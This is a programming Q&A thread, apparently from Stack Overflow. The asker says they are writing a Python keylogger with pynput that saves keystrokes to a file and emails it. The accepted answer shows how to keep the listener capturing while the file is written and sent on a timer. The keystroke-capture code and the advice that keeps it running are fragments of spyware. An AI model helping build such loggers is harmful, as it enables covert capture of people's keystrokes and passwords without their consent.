# How to callback from pynput.listener at regular intervals?

Tags: python

I'm writing a keylogger, and need help with backing it up without stopping the listener.

I'm writing a keylogger in python, which writes to a .txt file which is then emailed. I need to regularly write a temporary list of keystrokes to the file, as a backup. However, I appear to only be able to do this within the on_press or on_release callbacks, which means while the file is emailing off I am unable to pick up additional keystrokes, so I want to do a backup based on time passed, not keys pressed.

```
def on_press(key):
    global keystrokes
    keystrokes.append(key)
    if len(keystrokes)==100:
        write_send(keystrokes) #This is the function that does all my file 
                                writing and emailing, not included.

def on_release(key):
    #On_release script here, not included

while True:
    with Listener(on_press=on_press,on_release=on_release) as listener:
        listener.join()
```

Answer (score 1, accepted):

Instead of

```
while True:
    with Listener(on_press=on_press,on_release=on_release) as listener: 
         listener.join()
```

you can do

```
with Listener(on_press=on_press,on_release=on_release) as listener: 

     while True:
         # ... check time and write in file ...

     # listener.stop()  
     listener.join()
```

or you can use function `start()` (and `stop()`) in `Listener` and write it as:

```
listener = Listener(on_press=on_press,on_release=on_release)
listener.start()   

while True:
    # ... check time and write in file ...

listener.stop()   
listener.join()
```

Comment: I know you're not meant to use comments for this, but thank you so much, this was the perfect answer! I still need to learn about how threading.Threads work, so hopefully this is the next step to that. Have an awesome day!